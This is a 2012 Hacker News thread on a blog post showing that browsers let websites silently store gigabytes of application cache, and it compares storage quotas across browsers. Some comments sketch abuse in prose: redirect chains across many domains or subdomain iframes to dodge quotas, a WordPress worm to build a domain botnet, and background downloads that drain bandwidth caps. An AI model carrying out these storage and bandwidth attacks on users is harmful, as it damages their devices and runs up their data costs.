Hacker News new | past | comments | ask | show | jobs | submit login
How a web app can download and store over 2GB without you even knowing it (jclaes.blogspot.com)
112 points by Nemmie on March 25, 2012 | hide | past | favorite | 33 comments



The fact that there's a limit is not surprising. That the limit is 2GB is a little surprising, but this is across all sites, so ok. That there's no cache ejection when you reach the limit just seems like a bug. Why not use LRU?


I would not want one rogue site evicting the caches of all other sites.


It's just a cache. It can be repopulated. But I see your point, a lower per-domain quota would make more sense.


Isn't 2 GB the memory limit on V8 (http://code.google.com/p/v8/issues/detail?id=847)?


That's for the javascript engine, not necessarily for the caching.


The 2GB isn't just the local web-cache-size limit?


It would be fun to execute this against a mobile device, where storage is expensive. 2GB might be all that is required to choke the device. A neat client-side DDoS :)


Heh, you could easily DoS a Canadian home internet user (not mobile) by transferring a massive amount of data behind their back. So many people here are stuck with 25GB/mo limits.


That's absurd. I can't even imagine having to live with that kind of cap—I easily download 25GB in a day.


It's not uncommon to find ISPs with monthly quotas of a few GBs - aimed at light users.


I think Opera Mobile shouldn't have this cache problem either, similar to my comment about the desktop version. The default cache limit in Opera Mobile is ~2 MB.

I _believe_ that both quotas can be increased after confirmation from the user, but I haven't made any tests.


Or rack up an insane unexpected data bill.


iOS (and Android I think, but I primarily dev iOS so that's where my knowledge is) won't let a website exceed a 5MB local storage limit without explicit user consent...so I suppose still technically possible, but not without getting the user to agree to it first.


I wonder if you could still perform a DOS by doing the following:

  - register 1000 domains
  - when the browser navigates to the first domain, store 5Mb
  - once the store has finished, redirect to the next domain
  - repeat steps 2-3 ad infinitum
Anybody know if this would work?


That could probably work!

The documentation at http://dev.w3.org/html5/spec/offline.html#disk-space states that "care should be taken to ensure that the restrictions cannot be easily worked around using subdomains", so one would really have to use different domains as you write, which sounds a bit costly.


Sub-domains should work also then. Just make a page with bunch of IFrames, each on a different, random sub-domain.

Edit: Ooops; didn't see the comment above about sub-domains. Worth a try though!


A malicious actor might write a wordpress worm to assemble a domain botnet and cross-link them all to each other such that visiting one stores 5 megs of nonsense from every site on a visitor's client.


At least on Gingerbread, the browser has quite a low global limit -- I sometimes hit it just from using Twitter and Google Search.


I mean, theoretically. But would a user actually willingly wait out this process?


They would if you do it in an iframe while letting them play a flash game. They might even attribute slowdowns to the flash game.


it doesn't need to be downloaded. it can be populated with generated data using JavaScript.


You can store up to 50 mb in appcache (instead of localstorage) in mobile safari. You can also store 50 mb in the web sql storage, but i don't know if that shares the appcache storage or is counted separately. The 5 mb limit for localstorage is because that's what the spec recommends.


localStorage and application cache are not the same thing.

localStorage is the one that prompts the user for more than 5MB, but the author was using application, which I've never seen prompt.


unless something's changed in the last couple months, localStorage prompts for any storage, and cuts you off completely at 5MB.


If you're talking bandwidth cap attacks, then you could just keep cleaning out local storage and downloading more from /dev/random perpetually.


>As a user, I had no idea that the website I'm browsing is downloading a suspicious amount of data in the background.

not when you're browsing localhost, because it's implicitly trusted. chrome doesn't prompt you to allow access to the location services API when you're local either, but it does prompt for permission on the web. does the browser still not warn you if you try this same test using a remote server?


Hmm, that would be odd. Geolocation asks for permission even if it's localhost. Also when I download Angry Birds, no permission is asked.


This is not an issue in either Opera or Firefox. The title should probably reflect that it's limited to Chrome (and possibly other Webkit browsers + IE?).


Why is not an issue in Opera and Firefox? Do they have smaller maximum caches? Or do they notify you of the background transfers?


I don't think either notifies you about the background transfers, but e.g. Operas default cache limit for Application Cache is ~50 MB according to http://www.opera.com/support/usingopera/operaini/.


the default local storage limit for Firefox is 5 megs per domain.


Sorry for nitpicking, but I think local storage is a part of Web Storage (http://dev.w3.org/html5/webstorage/), and not Application Cache (http://www.whatwg.org/specs/web-apps/current-work/multipage/... or http://dev.w3.org/html5/spec/offline.html).

I think that the Application Cache quota is not strictly connected to the local storage and session storage limits.


That's correct. Chromium has talked about unifying all these kinds of storage under one quota system, but it's not done yet.




Consider applying for YC's Fall 2025 batch! Applications are open till Aug 4

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: